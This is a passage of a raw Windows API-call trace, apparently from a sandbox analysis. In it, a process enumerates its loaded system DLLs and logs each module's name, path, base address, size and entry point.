out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0052.665] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff760000, lpmodinfo=0x24c7350, cb=0x18 | out: lpmodinfo=0x24c7350*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0052.665] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff760000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0052.665] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff760000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0052.666] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff1c0000, lpmodinfo=0x24c9510, cb=0x18 | out: lpmodinfo=0x24c9510*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0052.666] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff1c0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0052.667] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff1c0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0052.668] GetModuleInformation (in: hProcess=0x218, hModule=0x77610000, lpmodinfo=0x24cb6d0, cb=0x18 | out: lpmodinfo=0x24cb6d0*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0052.669] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77610000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0052.670] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77610000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0052.670] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff350000, lpmodinfo=0x24cd890, cb=0x18 | out: lpmodinfo=0x24cd890*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0052.671] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff350000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0052.672] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff350000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0052.672] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff690000, lpmodinfo=0x24cfad8, cb=0x18 | out: lpmodinfo=0x24cfad8*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0052.673] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff690000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0052.674] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff690000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0052.674] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdb50000, lpmodinfo=0x24d1c98, cb=0x18 | out: lpmodinfo=0x24d1c98*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0052.675] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdb50000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0052.676] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdb50000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0052.677] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdf90000, lpmodinfo=0x24d3e58, cb=0x18 | out: lpmodinfo=0x24d3e58*(lpBaseOfDll=0x7fefdf90000, SizeOfImage=0xd7000, EntryPoint=0x7fefdf93274)) returned 1 [0052.677] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdf90000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0052.678] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdf90000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\OLEAUT32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")) returned 0x20 [0052.679] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff400000, lpmodinfo=0x24d6028, cb=0x18 | out: lpmodinfo=0x24d6028*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0052.680] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff400000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0052.681] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff400000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0052.682] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff9d0000, lpmodinfo=0x24d81e8, cb=0x18 | out: lpmodinfo=0x24d81e8*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0052.682] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff9d0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0052.683] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff9d0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0052.684] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd670000, lpmodinfo=0x24da3a8, cb=0x18 | out: lpmodinfo=0x24da3a8*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0052.685] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd670000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0052.686] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd670000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0052.687] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefee80000, lpmodinfo=0x24dc578, cb=0x18 | out: lpmodinfo=0x24dc578*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0052.688] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefee80000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0052.689] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefee80000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0052.690] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff430000, lpmodinfo=0x24de738, cb=0x18 | out: lpmodinfo=0x24de738*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0052.691] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff430000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0052.692] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff430000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0052.693] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff360000, lpmodinfo=0x24e0a20, cb=0x18 | out: lpmodinfo=0x24e0a20*(lpBaseOfDll=0x7feff360000, SizeOfImage=0x99000, EntryPoint=0x7feff361c10)) returned 1 [0052.694] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff360000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="CLBCatQ.DLL") returned 0xb [0052.697] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff360000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CLBCatQ.DLL" (normalized: "c:\\windows\\system32\\clbcatq.dll")) returned 0x1f [0052.698] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3f20000, lpmodinfo=0x24e2be0, cb=0x18 | out: lpmodinfo=0x24e2be0*(lpBaseOfDll=0x7fef3f20000, SizeOfImage=0x180000, EntryPoint=0x7fef3f580d0)) returned 1 [0052.700] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3f20000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="RacEngn.dll") returned 0xb [0052.701] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3f20000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RacEngn.dll" (normalized: "c:\\windows\\system32\\racengn.dll")) returned 0x1f [0052.702] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd2a0000, lpmodinfo=0x24e4da0, cb=0x18 | out: lpmodinfo=0x24e4da0*(lpBaseOfDll=0x7fefd2a0000, SizeOfImage=0x6d000, EntryPoint=0x7fefd2a1010)) returned 1 [0052.703] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd2a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="wevtapi.dll") returned 0xb [0052.704] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd2a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")) returned 0x1f [0052.705] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9d30000, lpmodinfo=0x24e6f78, cb=0x18 | out: lpmodinfo=0x24e6f78*(lpBaseOfDll=0x7fef9d30000, SizeOfImage=0x42000, EntryPoint=0x7fef9d317e4)) returned 1 [0052.707] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9d30000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="sqmapi.dll") returned 0xa [0052.708] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9d30000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")) returned 0x1e [0052.709] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa0d0000, lpmodinfo=0x24e9138, cb=0x18 | out: lpmodinfo=0x24e9138*(lpBaseOfDll=0x7fefa0d0000, SizeOfImage=0x12000, EntryPoint=0x7fefa0d1050)) returned 1 [0052.710] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa0d0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="AEPIC.dll") returned 0x9 [0052.711] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa0d0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\AEPIC.dll" (normalized: "c:\\windows\\system32\\aepic.dll")) returned 0x1d [0052.713] GetModuleInformation (in: hProcess=0x218, hModule=0x73ff0000, lpmodinfo=0x24eb2f8, cb=0x18 | out: lpmodinfo=0x24eb2f8*(lpBaseOfDll=0x73ff0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0052.714] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x73ff0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="sfc.dll") returned 0x7 [0052.716] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x73ff0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll")) returned 0x1b [0052.718] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa0c0000, lpmodinfo=0x24ed4a8, cb=0x18 | out: lpmodinfo=0x24ed4a8*(lpBaseOfDll=0x7fefa0c0000, SizeOfImage=0x10000, EntryPoint=0x7fefa0c1010)) returned 1 [0052.719] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa0c0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="sfc_os.DLL") returned 0xa [0052.720] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa0c0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sfc_os.DLL" (normalized: "c:\\windows\\system32\\sfc_os.dll")) returned 0x1e [0052.722] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc940000, lpmodinfo=0x24ef668, cb=0x18 | out: lpmodinfo=0x24ef668*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0052.723] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc940000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0052.725] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc940000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0052.727] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefe070000, lpmodinfo=0x24f1828, cb=0x18 | out: lpmodinfo=0x24f1828*(lpBaseOfDll=0x7fefe070000, SizeOfImage=0xd88000, EntryPoint=0x7fefe0ecebc)) returned 1 [0052.728] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefe070000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="SHELL32.dll") returned 0xb [0052.729] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefe070000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0052.732] GetModuleInformation (in: hProcess=0x218, hModule=0x7feff2d0000, lpmodinfo=0x24f39e8, cb=0x18 | out: lpmodinfo=0x24f39e8*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0052.733] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feff2d0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0052.735] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feff2d0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0052.736] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd780000, lpmodinfo=0x24f5ba8, cb=0x18 | out: lpmodinfo=0x24f5ba8*(lpBaseOfDll=0x7fefd780000, SizeOfImage=0xf000, EntryPoint=0x7fefd7819b0)) returned 1 [0052.738] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd780000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0052.739] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd780000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")) returned 0x1f [0052.741] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3ee0000, lpmodinfo=0x24f7d68, cb=0x18 | out: lpmodinfo=0x24f7d68*(lpBaseOfDll=0x7fef3ee0000, SizeOfImage=0x33000, EntryPoint=0x7fef3f0a834)) returned 1 [0052.742] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3ee0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="sqlceoledb30.dll") returned 0x10 [0052.744] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3ee0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sqlceoledb30.dll" (normalized: "c:\\windows\\system32\\sqlceoledb30.dll")) returned 0x24 [0052.746] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3e60000, lpmodinfo=0x24f9f48, cb=0x18 | out: lpmodinfo=0x24f9f48*(lpBaseOfDll=0x7fef3e60000, SizeOfImage=0x74000, EntryPoint=0x7fef3ec0524)) returned 1 [0052.747] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3e60000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="sqlcese30.dll") returned 0xd [0052.749] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3e60000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sqlcese30.dll" (normalized: "c:\\windows\\system32\\sqlcese30.dll")) returned 0x21 [0052.751] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3d80000, lpmodinfo=0x24fc118, cb=0x18 | out: lpmodinfo=0x24fc118*(lpBaseOfDll=0x7fef3d80000, SizeOfImage=0xd1000, EntryPoint=0x7fef3e38628)) returned 1 [0052.752] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3d80000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="sqlceqp30.dll") returned 0xd [0052.754] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3d80000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sqlceqp30.dll" (normalized: "c:\\windows\\system32\\sqlceqp30.dll")) returned 0x21 [0052.756] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3cf0000, lpmodinfo=0x24fe2e8, cb=0x18 | out: lpmodinfo=0x24fe2e8*(lpBaseOfDll=0x7fef3cf0000, SizeOfImage=0x85000, EntryPoint=0x7fef3d37bb0)) returned 1 [0052.758] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3cf0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="WinSATAPI.dll") returned 0xd [0052.759] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3cf0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WinSATAPI.dll" (normalized: "c:\\windows\\system32\\winsatapi.dll")) returned 0x21 [0052.761] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefadb0000, lpmodinfo=0x25004b8, cb=0x18 | out: lpmodinfo=0x25004b8*(lpBaseOfDll=0x7fefadb0000, SizeOfImage=0xa7000, EntryPoint=0x7fefadc050c)) returned 1 [0052.764] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefadb0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="dxgi.dll") returned 0x8 [0052.766] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefadb0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll")) returned 0x1c [0052.768] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbca0000, lpmodinfo=0x2502890, cb=0x18 | out: lpmodinfo=0x2502890*(lpBaseOfDll=0x7fefbca0000, SizeOfImage=0x18000, EntryPoint=0x7fefbca1130)) returned 1 [0052.770] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbca0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0052.772] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbca0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")) returned 0x1e [0052.774] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbeb0000, lpmodinfo=0x2504a50, cb=0x18 | out: lpmodinfo=0x2504a50*(lpBaseOfDll=0x7fefbeb0000, SizeOfImage=0x215000, EntryPoint=0x7fefc0864b0)) returned 1 [0052.775] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbeb0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="gdiplus.dll") returned 0xb [0052.781] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbeb0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll")) returned 0x73 [0052.783] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdc80000, lpmodinfo=0x2506cb8, cb=0x18 | out: lpmodinfo=0x2506cb8*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0052.785] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdc80000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0052.787] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdc80000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0052.789] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9a0000, lpmodinfo=0x2508ea0, cb=0x18 | out: lpmodinfo=0x2508ea0*(lpBaseOfDll=0x7fefd9a0000, SizeOfImage=0x36000, EntryPoint=0x7fefd9a1474)) returned 1 [0052.791] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="CFGMGR32.dll") returned 0xc [0052.794] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9a0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CFGMGR32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")) returned 0x20 [0052.796] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd980000, lpmodinfo=0x250b070, cb=0x18 | out: lpmodinfo=0x250b070*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0052.798] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd980000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0052.800] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd980000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0052.802] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef3af0000, lpmodinfo=0x250d230, cb=0x18 | out: lpmodinfo=0x250d230*(lpBaseOfDll=0x7fef3af0000, SizeOfImage=0x1f2000, EntryPoint=0x7fef3af101c)) returned 1 [0052.804] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef3af0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="msxml6.dll") returned 0xa [0052.806] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef3af0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll")) returned 0x1e [0052.839] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9e0000, lpmodinfo=0x250f3f0, cb=0x18 | out: lpmodinfo=0x250f3f0*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0052.842] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0052.845] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0052.847] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd820000, lpmodinfo=0x25115b0, cb=0x18 | out: lpmodinfo=0x25115b0*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0052.849] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd820000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0052.852] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd820000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0052.854] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefc2b0000, lpmodinfo=0x2513770, cb=0x18 | out: lpmodinfo=0x2513770*(lpBaseOfDll=0x7fefc2b0000, SizeOfImage=0x1f4000, EntryPoint=0x7fefc43c924)) returned 1 [0052.856] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefc2b0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0052.859] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefc2b0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")) returned 0x7c [0052.861] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd640000, lpmodinfo=0x25159f8, cb=0x18 | out: lpmodinfo=0x25159f8*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0052.864] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd640000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0052.866] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd640000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0052.869] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb800000, lpmodinfo=0x2517bb8, cb=0x18 | out: lpmodinfo=0x2517bb8*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0052.872] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb800000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0052.874] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb800000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0052.876] GetModuleInformation (in: hProcess=0x218, hModule=0x7feffae0000, lpmodinfo=0x2519d78, cb=0x18 | out: lpmodinfo=0x2519d78*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0052.879] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7feffae0000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0052.881] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7feffae0000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0052.883] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x251bf38, cb=0x18 | out: lpmodinfo=0x251bf38*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0052.886] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0052.888] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0x784440, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0052.891] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x251e0f8, cb=0x18 | out: lpmodinfo=0x251e0f8*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0052.893] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0x784440, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0052.896] GetModuleFileNameExW (in: 